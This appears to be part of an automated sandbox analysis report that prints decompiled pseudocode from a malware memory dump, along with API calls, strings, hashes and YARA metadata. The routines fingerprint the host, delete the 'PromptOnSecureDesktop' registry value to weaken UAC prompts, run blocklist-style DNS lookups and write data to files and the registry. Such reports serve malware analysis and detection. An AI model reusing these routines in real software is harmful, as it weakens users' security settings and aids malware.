				intOrPtr _t43;

				_v16 = 0;
				_t19 = LoadLibraryA("Iphlpapi.dll");
				if(_t19 == 0) {
					L15:
					return _v16;
				}
				_t28 = GetProcAddress(_t19, "GetAdaptersAddresses");
				if(_t28 == 0) {
					L14:
					goto L15;
				}
				_push( &_v12);
				_v8 = 0;
				_v12 = 0;
				_push(0);
				while(1) {
					_t41 =  *_t28(2, 0, 0);
					if(_t41 != 0x6f) {
						break;
					}
					_t24 = E0040EBED(_v8, _v12);
					if(_t24 == 0) {
						break;
					}
					_push( &_v12);
					_v8 = _t24;
					_push(_t24);
				}
				if(_t41 != 0) {
					L11:
					if(_v8 != 0) {
						E0040EC2E(_v8);
					}
					L13:
					goto L14;
				}
				_t26 = _v8;
				if(_t26 == 0) {
					goto L13;
				} else {
					goto L8;
				}
				do {
					L8:
					_t43 =  *((intOrPtr*)(_t26 + 0x34));
					_t39 = 0;
					if(_t43 <= 0) {
						goto L10;
					} else {
						goto L9;
					}
					do {
						L9:
						_v16 = _v16 ^ ( *(_t26 + _t39 + 0x2c) & 0x000000ff) << (_t39 & 0x00000003) << 0x00000003;
						_t39 = _t39 + 1;
					} while (_t39 < _t43);
					L10:
					_t26 =  *((intOrPtr*)(_t26 + 8));
				} while (_t26 != 0);
				goto L11;
			}

0x00401ad1
0x00401ad4
0x00401adc
0x00401b6b
0x00401b70
0x00401b70
0x00401aef
0x00401af3
0x00401b6a
0x00000000
0x00401b6a
0x00401af9
0x00401afa
0x00401afd
0x00401b00
0x00401b1c
0x00401b22
0x00401b27
0x00000000
0x00000000
0x00401b09
0x00401b12
0x00000000
0x00000000
0x00401b17
0x00401b18
0x00401b1b
0x00401b1b
0x00401b2b
0x00401b5b
0x00401b5e
0x00401b63
0x00401b68
0x00401b69
0x00000000
0x00401b69
0x00401b2d
0x00401b32
0x00000000
0x00000000
0x00000000
0x00000000
0x00401b34
0x00401b34
0x00401b34
0x00401b37
0x00401b3b
0x00000000
0x00000000
0x00000000
0x00000000
0x00401b3d
0x00401b3d
0x00401b4c
0x00401b4f
0x00401b50
0x00401b54
0x00401b54
0x00401b57
0x00000000

APIs

LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00401AD4
GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00401AE9

Strings

Iphlpapi.dll, xrefs: 00401ACC
GetAdaptersAddresses, xrefs: 00401AE3

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: GetAdaptersAddresses$Iphlpapi.dll
API String ID: 2574300362-1087626847
Opcode ID: 4ad453f95e319ae71f8ebabcc46d8d27ffdc7fe226df516f9f2c7e6519cf6946
Instruction ID: f6c238f91e07a5798e813b0b618c72a9a5addbcd8e0b61e0281ff71d4ef1483f
Opcode Fuzzy Hash: 4ad453f95e319ae71f8ebabcc46d8d27ffdc7fe226df516f9f2c7e6519cf6946
Instruction Fuzzy Hash: 3D11DA71E01124BFCB11DBA5DD858EEBBB9EB44B10B144077E005F72A1E7786E80CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00401BDF, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00401BDF() {
				long _v8;
				long _v12;
				void* _v27;
				char _v28;
				void* _t14;
				signed int _t21;
				signed int _t30;
				void* _t31;

				_v28 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t30 = 0;
				_v12 = 0;
				asm("stosb");
				_v8 = 0xf;
				_t14 = E00401AC3();
				if(_t14 == 0) {
					if(GetComputerNameA( &_v28,  &_v8) == 0) {
						L6:
						GetVolumeInformationA(0, 0, 4,  &_v12, 0, 0, 0, 0);
						return _v12;
					}
					_t21 = 0;
					if(_v8 <= 0) {
						goto L6;
					} else {
						goto L3;
					}
					do {
						L3:
						_t30 = _t30 ^  *(_t31 + _t21 - 0x18) << (_t21 & 0x00000003) << 0x00000003;
						_t21 = _t21 + 1;
					} while (_t21 < _v8);
					if(_t30 == 0) {
						goto L6;
					}
					return _t30;
				}
				return _t14;
			}

0x00401bec
0x00401bf2
0x00401bf3
0x00401bf4
0x00401bf5
0x00401bf7
0x00401bf9
0x00401bfc
0x00401bfd
0x00401c04
0x00401c0b
0x00401c1d
0x00401c45
0x00401c51
0x00000000
0x00401c57
0x00401c1f
0x00401c24
0x00000000
0x00000000
0x00000000
0x00000000
0x00401c26
0x00401c26
0x00401c35
0x00401c37
0x00401c38
0x00401c3f
0x00000000
0x00000000
0x00000000
0x00401c41
0x00401c5e

APIs

Part of subcall function 00401AC3: LoadLibraryA.KERNEL32(Iphlpapi.dll,00000000,localcfg,?,hi_id,?,?,?,?,00000001), ref: 00401AD4
Part of subcall function 00401AC3: GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses), ref: 00401AE9

GetComputerNameA.KERNEL32 ref: 00401C15
GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00000001), ref: 00401C51

Strings

localcfg, xrefs: 00401BE7
hi_id, xrefs: 00401BE5

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: AddressComputerInformationLibraryLoadNameProcVolume
String ID: hi_id$localcfg
API String ID: 2777991786-2393279970
Opcode ID: 8706900559274ba91d770fb8bb1d60ecae66f9331a84d665d36368a2f022e804
Instruction ID: b3a67a5cb4ed68e183e77afdc8505cc80d304e276af6d439446d09174096bcc5
Opcode Fuzzy Hash: 8706900559274ba91d770fb8bb1d60ecae66f9331a84d665d36368a2f022e804
Instruction Fuzzy Hash: B2018072A44118BBEB10EAE8C8C59EFBABCAB48745F104476E602F3290D274DE4486A5

Uniqueness

Uniqueness Score: -1.00%

Function 004096FF, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48
registryCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E004096FF(void* __ecx) {
				void* _v8;
				char* _t6;
				char* _t10;
				void* _t23;
				void* _t24;

				_t16 = __ecx;
				_push(__ecx);
				_t6 = E00402544(0x4122f8,  &E004106AC, 0x2e, 0xe4, 0xc8);
				_t24 = _t23 + 0x14;
				if(RegOpenKeyExA(0x80000001, _t6, 0, 0x103,  &_v8) == 0) {
					_t10 = E00402544(0x4122f8,  &E004106A0, 9, 0xe4, 0xc8);
					_t24 = _t24 + 0x14;
					RegDeleteValueA(_v8, _t10);
					RegCloseKey(_v8);
				}
				E0040EE2A(_t16, 0x4122f8, 0, 0x100);
				return 0;
			}

0x004096ff
0x00409702
0x00409728
0x0040972d
0x0040973e
0x0040974a
0x0040974f
0x00409756
0x0040975f
0x0040975f
0x0040976d
0x0040977b

APIs

RegOpenKeyExA.ADVAPI32(80000001,00000000,PromptOnSecureDesktop,00000000,?,?,0040A14A), ref: 00409736
RegDeleteValueA.ADVAPI32(0040A14A,00000000,?,?,?,?,?,?,?,?,?,0040A14A), ref: 00409756
RegCloseKey.ADVAPI32(0040A14A,?,?,?,?,?,?,?,?,?,0040A14A), ref: 0040975F

Strings

PromptOnSecureDesktop, xrefs: 00409704, 00409722, 00409727, 00409749, 0040976C

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: CloseDeleteOpenValue
String ID: PromptOnSecureDesktop
API String ID: 849931509-2980165447
Opcode ID: 2a8abeb1ae8c575472f9bd74b3adb91cbf41d09789710805d0faf142c4fb6012
Instruction ID: 5e38ed9511aa8cc069582274463af9cddeeab7037fd65aad7bdf8be664a95ff7
Opcode Fuzzy Hash: 2a8abeb1ae8c575472f9bd74b3adb91cbf41d09789710805d0faf142c4fb6012
Instruction Fuzzy Hash: 5AF0C8B2680118BBF3106B51AC0BFDF3A2CDB44704F100075F605B50D2E6E55E9082BD

Uniqueness

Uniqueness Score: -1.00%

Function 00402684, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20networkCOMMON

Download Yara Rule

APIs

inet_addr.WS2_32(?), ref: 00402693
gethostbyname.WS2_32(?), ref: 0040269F

Strings

~s`ysps, xrefs: 00402693
time_cfg, xrefs: 00402684

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: gethostbynameinet_addr
String ID: time_cfg$~s`ysps
API String ID: 1594361348-2010419113
Opcode ID: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
Instruction ID: 506fadec158220b53989f58c32679351ed61dc8f5455c60e8cf87b9af1828998
Opcode Fuzzy Hash: f9db606e706a3ea9b2ac4bed422f000f2ba59a3d29e70a13aafe2ea60d03e68c
Instruction Fuzzy Hash: 9CE08C302040219FCB108B28F848AC637A4AF06330F0189A2F840E32E0C7B89CC08688

Uniqueness

Uniqueness Score: -1.00%

Function 00401C5F, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401C5F(void* __eflags) {
				signed int _t49;
				signed int _t51;
				void* _t80;
				char _t91;
				void* _t92;
				signed int _t98;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t107;
				void* _t108;

				_t105 = _t107 - 0x70;
				_t108 = _t107 - 0x114;
				 *(_t105 + 0x6c) =  *(_t105 + 0x6c) & 0x00000000;
				_t98 =  *(_t105 + 0x7c);
				 *(_t105 + 0x7c) =  *(_t105 + 0x7c) & 0x00000000;
				_t101 = E0040ED03(_t98, 0x2c);
				if(_t101 == 0) {
					L6:
					_t49 = _t98;
					_t32 = _t49 + 1; // 0x2
					_t102 = _t32;
					do {
						_t91 =  *_t49;
						_t49 = _t49 + 1;
					} while (_t91 != 0);
					 *((char*)(_t105 + _t49 - _t102 - 0x24)) = _t91;
					_t51 = _t98;
					_t35 = _t51 + 1; // 0x2
					_t103 = _t35;
					do {
						_t92 =  *_t51;
						_t51 = _t51 + 1;
					} while (_t92 != 0);
					E0040EE5C(_t105 - 0x24, _t98, _t51 - _t103);
					wsprintfA(_t105 - 0xa4, "%u.%u.%u.%u.%s",  *(_t105 + 0x7b) & 0x000000ff,  *(_t105 + 0x7a) & 0x000000ff,  *(_t105 + 0x79) & 0x000000ff,  *(_t105 + 0x78) & 0x000000ff, _t105 - 0x24);
					if(E00402684(_t105 - 0xa4) != 0) {
						 *(_t105 + 0x6c) =  *(_t105 + 0x6c) | 1 <<  *(_t105 + 0x7c);
					}
					L12:
					return  *(_t105 + 0x6c);
				}
				 *(_t105 + 0x5c) =  *(_t105 + 0x78) & 0x000000ff;
				 *(_t105 + 0x60) =  *(_t105 + 0x79) & 0x000000ff;
				 *(_t105 + 0x68) =  *(_t105 + 0x7a) & 0x000000ff;
				 *(_t105 + 0x64) =  *(_t105 + 0x7b) & 0x000000ff;
				while(1) {
					 *((char*)(_t105 + _t101 - _t98 - 0x24)) = 0;
					E0040EE5C(_t105 - 0x24, _t98, _t101 - _t98);
					_t22 = _t101 + 1; // 0x1
					_t98 = _t22;
					wsprintfA(_t105 - 0xa4, "%u.%u.%u.%u.%s",  *(_t105 + 0x64),  *(_t105 + 0x68),  *(_t105 + 0x60),  *(_t105 + 0x5c), _t105 - 0x24);
					_t80 = E00402684(_t105 - 0xa4);
					_t108 = _t108 + 0x2c;
					if(_t80 != 0) {
						 *(_t105 + 0x6c) =  *(_t105 + 0x6c) | 1 <<  *(_t105 + 0x7c);
					}
					 *(_t105 + 0x7c) =  *(_t105 + 0x7c) + 1;
					if( *(_t105 + 0x7c) > 0x1e) {
						goto L12;
					}
					_t101 = E0040ED03(_t98, 0x2c);
					if(_t101 != 0) {
						continue;
					}
					goto L6;
				}
				goto L12;
			}

0x00401c60
0x00401c64
0x00401c6a
0x00401c71
0x00401c74
0x00401c86
0x00401c8c
0x00401d1c
0x00401d1c
0x00401d1e
0x00401d1e
0x00401d21
0x00401d21
0x00401d23
0x00401d24
0x00401d2a
0x00401d2e
0x00401d30
0x00401d30
0x00401d33
0x00401d33
0x00401d35
0x00401d36
0x00401d42
0x00401d6b
0x00401d7e
0x00401d88
0x00401d88
0x00401d8b
0x00401d95
0x00401d95
0x00401c96
0x00401c9d
0x00401ca4
0x00401cab
0x00401cae
0x00401cb3
0x00401cbd
0x00401cd2
0x00401cd2
0x00401ce1
0x00401cea
0x00401cef
0x00401cf4
0x00401cfe
0x00401cfe
0x00401d04
0x00401d0a
0x00000000
0x00000000
0x00401d14
0x00401d1a
0x00000000
0x00000000
0x00000000
0x00401d1a
0x00000000

APIs

wsprintfA.USER32 ref: 00401CE1
wsprintfA.USER32 ref: 00401D6B

Strings

%u.%u.%u.%u.%s, xrefs: 00401CDB, 00401D65
localcfg, xrefs: 00401C70

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: wsprintf
String ID: %u.%u.%u.%u.%s$localcfg
API String ID: 2111968516-120809033
Opcode ID: 013209f5f393509082169113c365cfa774f3339610439ce827356f9210efd2df
Instruction ID: f60862e96afe744063ef1f8e151e0253a3d6131670b42bf9f562b78b9aabf051
Opcode Fuzzy Hash: 013209f5f393509082169113c365cfa774f3339610439ce827356f9210efd2df
Instruction Fuzzy Hash: 3C41C1729042999FDB21DF798D44BEE7BE89F49310F240066FD64E3192D639EA04CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00403F18, Relevance: 6.0, APIs: 4, Instructions: 46
filesynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403F18(void* _a4, void* _a8, long _a12, long _a16, long _a20) {
				struct _OVERLAPPED _v24;
				long _t30;
				void* _t31;

				_v24.Offset = _v24.Offset & 0x00000000;
				_v24.OffsetHigh = _v24.OffsetHigh & 0x00000000;
				_t30 = _a12;
				_t31 = _a16;
				_a16 = _a16 & 0x00000000;
				_v24.hEvent = _t31;
				if(WriteFile(_a4, _a8, _t30,  &_a16,  &_v24) != 0) {
					L3:
					if(_t30 != _a16) {
						L5:
						return 0;
					}
					return 1;
				}
				if(GetLastError() != 0x3e5) {
					goto L5;
				}
				WaitForSingleObject(_t31, _a20);
				if(GetOverlappedResult(_a4,  &_v24,  &_a16, 0) == 0) {
					goto L5;
				}
				goto L3;
			}

0x00403f1e
0x00403f22
0x00403f27
0x00403f2b
0x00403f2e
0x00403f3e
0x00403f4c
0x00403f7c
0x00403f7f
0x00403f86
0x00000000
0x00403f86
0x00000000
0x00403f83
0x00403f59
0x00000000
0x00000000
0x00403f5f
0x00403f7a
0x00000000
0x00000000
0x00000000

APIs

WriteFile.KERNEL32(00000000,00000000,0040A3C7,00000000,00000000,000007D0,00000001), ref: 00403F44
GetLastError.KERNEL32 ref: 00403F4E
WaitForSingleObject.KERNEL32(00000004,?), ref: 00403F5F
GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403F72

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: ErrorFileLastObjectOverlappedResultSingleWaitWrite
String ID:
API String ID: 3373104450-0
Opcode ID: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
Instruction ID: 81d5a9f64dfd66904774ebc82d2e0e48c629fa8216d99cd76bf4a5dbd4e59073
Opcode Fuzzy Hash: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
Instruction Fuzzy Hash: B9010C7291110AABDF01DF90ED44BEF7B7CEB08356F104066FA01E2190D774DA558BB6

Uniqueness

Uniqueness Score: -1.00%

Function 00403F8C, Relevance: 6.0, APIs: 4, Instructions: 46
filesynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403F8C(void* _a4, void* _a8, long _a12, long _a16, long _a20) {
				struct _OVERLAPPED _v24;
				long _t30;
				void* _t31;

				_v24.Offset = _v24.Offset & 0x00000000;
				_v24.OffsetHigh = _v24.OffsetHigh & 0x00000000;
				_t30 = _a12;
				_t31 = _a16;
				_a16 = _a16 & 0x00000000;
				_v24.hEvent = _t31;
				if(ReadFile(_a4, _a8, _t30,  &_a16,  &_v24) != 0) {
					L3:
					if(_t30 != _a16) {
						L5:
						return 0;
					}
					return 1;
				}
				if(GetLastError() != 0x3e5) {
					goto L5;
				}
				WaitForSingleObject(_t31, _a20);
				if(GetOverlappedResult(_a4,  &_v24,  &_a16, 0) == 0) {
					goto L5;
				}
				goto L3;
			}

0x00403f92
0x00403f96
0x00403f9b
0x00403f9f
0x00403fa2
0x00403fb2
0x00403fc0
0x00403ff0
0x00403ff3
0x00403ffa
0x00000000
0x00403ffa
0x00000000
0x00403ff7
0x00403fcd
0x00000000
0x00000000
0x00403fd3
0x00403fee
0x00000000
0x00000000
0x00000000

APIs

ReadFile.KERNEL32(00000000,00000000,0040A3C7,00000000,00000000,000007D0,00000001), ref: 00403FB8
GetLastError.KERNEL32 ref: 00403FC2
WaitForSingleObject.KERNEL32(00000004,?), ref: 00403FD3
GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403FE6

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: ErrorFileLastObjectOverlappedReadResultSingleWait
String ID:
API String ID: 888215731-0
Opcode ID: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
Instruction ID: 44fd539f7a3468c5635e20a1652967c761b46accf60e77792ab8a53432005efc
Opcode Fuzzy Hash: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
Instruction Fuzzy Hash: A601177291110AAFDF01DF90ED45BEF3B7CEF08356F004062F906E2090D7749A549BA6

Uniqueness

Uniqueness Score: -1.00%

Function 0040A4C7, Relevance: 6.0, APIs: 4, Instructions: 27
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040A4C7(intOrPtr _a4) {
				long _t3;
				LONG* _t8;
				long _t9;

				_t9 = GetTickCount();
				_t8 = _a4 + 0x5c;
				while(1) {
					_t3 = InterlockedExchange(_t8, 1);
					if(_t3 == 0) {
						break;
					}
					_t3 = GetTickCount() - _t9;
					if(_t3 < 0x1388) {
						Sleep(0);
						continue;
					}
					break;
				}
				return _t3;
			}

0x0040a4dd
0x0040a4df
0x0040a4f7
0x0040a4fa
0x0040a4fe
0x00000000
0x00000000
0x0040a4e6
0x0040a4ed
0x0040a4f1
0x00000000
0x0040a4f1
0x00000000
0x0040a4ed
0x0040a504

APIs

GetTickCount.KERNEL32 ref: 0040A4D1
GetTickCount.KERNEL32 ref: 0040A4E4
Sleep.KERNEL32(00000000,?,0040C2E9,0040C4E0,00000000,localcfg,?,0040C4E0,00413588,00408810), ref: 0040A4F1
InterlockedExchange.KERNEL32(?,00000001), ref: 0040A4FA

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: CountTick$ExchangeInterlockedSleep
String ID:
API String ID: 2207858713-0
Opcode ID: 4cd0520482080c365333fb8aab0c55e365768e1349ae612301bcb729eb943e51
Instruction ID: a5473328a7e7118e9aede6741b06156156ec1e7733dd8d1ec56465b12724d56e
Opcode Fuzzy Hash: 4cd0520482080c365333fb8aab0c55e365768e1349ae612301bcb729eb943e51
Instruction Fuzzy Hash: 7DE0863720131567C6005BA5BD84FAA7B98AB4D761F164072FB08E3280D6AAA99145BF

Uniqueness

Uniqueness Score: -1.00%

Function 00404E92, Relevance: 6.0, APIs: 4, Instructions: 27
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404E92(void* __ecx) {
				long _t2;
				void* _t7;
				LONG* _t8;
				long _t9;

				_t7 = __ecx;
				_t9 = GetTickCount();
				_t8 = _t7 + 4;
				while(1) {
					_t2 = InterlockedExchange(_t8, 1);
					if(_t2 == 0) {
						break;
					}
					_t2 = GetTickCount() - _t9;
					if(_t2 < 0x2710) {
						Sleep(0xa);
						continue;
					}
					break;
				}
				return _t2;
			}

0x00404e9c
0x00404ea6
0x00404ea8
0x00404ec0
0x00404ec3
0x00404ec7
0x00000000
0x00000000
0x00404eaf
0x00404eb6
0x00404eba
0x00000000
0x00404eba
0x00000000
0x00404eb6
0x00404ecd

APIs

GetTickCount.KERNEL32 ref: 00404E9E
GetTickCount.KERNEL32 ref: 00404EAD
Sleep.KERNEL32(0000000A,?,00000001), ref: 00404EBA
InterlockedExchange.KERNEL32(?,00000001), ref: 00404EC3

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: CountTick$ExchangeInterlockedSleep
String ID:
API String ID: 2207858713-0
Opcode ID: 574f7709b1251d8d4516fda0e718bcbaf1509578ef326d685951742d25275ed5
Instruction ID: 0be737a4b1ecb403dd0b6a084e6b0260aeafc6613011e157a8d43e60cd200510
Opcode Fuzzy Hash: 574f7709b1251d8d4516fda0e718bcbaf1509578ef326d685951742d25275ed5
Instruction Fuzzy Hash: 6AE086B620121457D61027B9FD84F966A89AB9A361F010532F70DE21C0C6AA989345FD

Uniqueness

Uniqueness Score: -1.00%

Function 00404BD1, Relevance: 6.0, APIs: 4, Instructions: 27
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404BD1(void* __ecx) {
				long _t2;
				void* _t7;
				LONG* _t8;
				long _t9;

				_t7 = __ecx;
				_t9 = GetTickCount();
				_t8 = _t7 + 0xc;
				while(1) {
					_t2 = InterlockedExchange(_t8, 1);
					if(_t2 == 0) {
						break;
					}
					_t2 = GetTickCount() - _t9;
					if(_t2 < 0x1388) {
						Sleep(0);
						continue;
					}
					break;
				}
				return _t2;
			}

0x00404bdb
0x00404be5
0x00404be7
0x00404bff
0x00404c02
0x00404c06
0x00000000
0x00000000
0x00404bee
0x00404bf5
0x00404bf9
0x00000000
0x00404bf9
0x00000000
0x00404bf5
0x00404c0c

APIs

GetTickCount.KERNEL32 ref: 00404BDD
GetTickCount.KERNEL32 ref: 00404BEC
Sleep.KERNEL32(00000000,?,?,?,00000004,004050F2), ref: 00404BF9
InterlockedExchange.KERNEL32(-00000008,00000001), ref: 00404C02

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: CountTick$ExchangeInterlockedSleep
String ID:
API String ID: 2207858713-0
Opcode ID: 1ad869c4a91a2c80201434bef060b196597965ff38d45849583c02ff4b747b44
Instruction ID: c27c4130c4fb343c81443d6f5f76baf76a02980c1ff66e5fdc0d00212ab38f61
Opcode Fuzzy Hash: 1ad869c4a91a2c80201434bef060b196597965ff38d45849583c02ff4b747b44
Instruction Fuzzy Hash: FCE0867624521457D61027A66D80FA67BA89B99361F064073F70CE2190C9AAE48141BD

Uniqueness

Uniqueness Score: -1.00%

Function 004030FA, Relevance: 6.0, APIs: 4, Instructions: 23
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004030FA(LONG* _a4) {
				long _t3;
				long _t5;

				_t5 = GetTickCount();
				while(1) {
					_t3 = InterlockedExchange(_a4, 1);
					if(_t3 == 0) {
						break;
					}
					_t3 = GetTickCount() - _t5;
					if(_t3 < 0x1388) {
						Sleep(0);
						continue;
					}
					break;
				}
				return _t3;
			}

0x0040310b
0x00403122
0x00403128
0x0040312c
0x00000000
0x00000000
0x00403111
0x00403118
0x0040311c
0x00000000
0x0040311c
0x00000000
0x00403118
0x00403131

APIs

GetTickCount.KERNEL32 ref: 00403103
GetTickCount.KERNEL32 ref: 0040310F
Sleep.KERNEL32(00000000), ref: 0040311C
InterlockedExchange.KERNEL32(?,00000001), ref: 00403128

Memory Dump Source

Source File: 00000015.00000002.797152271.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000015.00000002.797203638.0000000000414000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_400000_86C4.jbxd

Yara matches

Similarity

API ID: CountTick$ExchangeInterlockedSleep
String ID:
API String ID: 2207858713-0
Opcode ID: 5475aadbbb6481cfb66701b566d3724b8cf1f0baef2ba10e865a3ab4c750e63b
Instruction ID: 9edc608f4d32da9f9de986fa19dd3c9deb40157c310ade5cfb00ff6fe32d5b40
Opcode Fuzzy Hash: 5475aadbbb6481cfb66701b566d3724b8cf1f0baef2ba10e865a3ab4c750e63b
Instruction Fuzzy Hash: 51E0C235200215ABDB00AF75BD44B8A6E9EDF8C762F014432F205EA1E0C9F44D51897A

Uniqueness

Uniqueness Score: -1.00%

Function 0040E177, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148
fileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040E177(signed int _a4, long _a8) {
				void* _v8;
				void* _v12;
				void* __ecx;
				void* _t31;
				void* _t34;
				intOrPtr* _t36;
				void* _t38;
				intOrPtr* _t41;
				void* _t43;
				void* _t46;
				void* _t47;
				void* _t57;
				void* _t58;
				void* _t67;
				void* _t68;
				void* _t72;
				void* _t77;

				_push(_t58);
				_push(_t58);
				if(_a8 != 0) {
					L2:
					if( *0x4136c0 == 0) {
						L20:
						_t31 = 1;
						L21:
						return _t31;
					}
					if((_a4 & 0x00000001) != 0) {
						_t46 = E0040DFE2(_t58, 1,  &_v8,  &_a8);
						_t67 = _t67 + 0xc;
						if(_t46 != 0) {
							_t81 = _a8;
							if(_a8 != 0) {
								_t47 = E0040DBCF(_t81, 0x40000000, 2);
								_pop(_t58);
								_v12 = _t47;
								if(_t47 != 0xffffffff) {
									_t57 = _v8;
									if(_t57 != 0 && _a8 != 0) {
										E00402544(_t57, _t57, _a8, 0xe4, 0xc8);
										_t67 = _t67 + 0x14;
										if(WriteFile(_v12, _t57, _a8,  &_a8, 0) != 0) {
											 *0x4136c0 =  *0x4136c0 & 0x00000000;
										}
									}
									CloseHandle(_v12);
								}
							}
						}
					}
					if((_a4 & 0x00000002) == 0) {
						L19:
						goto L20;
					}
					_t34 = E0040DFE2(_t58, 2,  &_v8,  &_a8);
					_t68 = _t67 + 0xc;
					if(_t34 == 0 || _a8 == 0) {
						goto L19;
					} else {
						E00402544(_v8, _v8, _a8, 0xe4, 0xc8);
						_t36 = E00402544(0x4128f8, 0x4110d0, 7, 0xe4, 0xc8);
						_t38 = E0040E095(0x80000001, E00402544(0x4122f8, 0x4110bc, 0x14, 0xe4, 0xc8), _t36, _v8, _a8);
						_t72 = _t68 + 0x50;
						if(_t38 != 0) {
							L17:
							 *0x4136c0 =  *0x4136c0 & 0x00000000;
							L18:
							E0040EE2A(_t58, 0x4122f8, 0, 0x100);
							E0040EE2A(_t58, 0x4128f8, 0, 0x100);
							goto L19;
						}
						_t41 = E00402544(0x4128f8, 0x4110d0, 7, 0xe4, 0xc8);
						_t43 = E0040E095(0x80000001, E00402544(0x4122f8, 0x4110a0, 0x19, 0xe4, 0xc8), _t41, _v8, _a8);
						_t72 = _t72 + 0x3c;
						if(_t43 == 0) {
							goto L18;
						}
						goto L17;
					}
				}
				_t31 = 1;
				_t77 =  *0x4120ec - _t31; // 0x1
				if(_t77 != 0) {
					goto L21;
				}
				goto L2;
			}

0x0040e17a
0x0040e17b
0x0040e182
0x0040e193
0x0040e199
0x0040e312
0x0040e314
0x0040e315
0x0040e317
0x0040e317
0x0040e1ad
0x0040e1b9
0x0040e1be
0x0040e1c3
0x0040e1c5
0x0040e1c8
0x0040e1d1
0x0040e1d7
0x0040e1d8
0x0040e1de
0x0040e1e0
0x0040e1e5
0x0040e1f4
0x0040e1f9
0x0040e211
0x0040e213
0x0040e213
0x0040e211
0x0040e21d
0x0040e21d
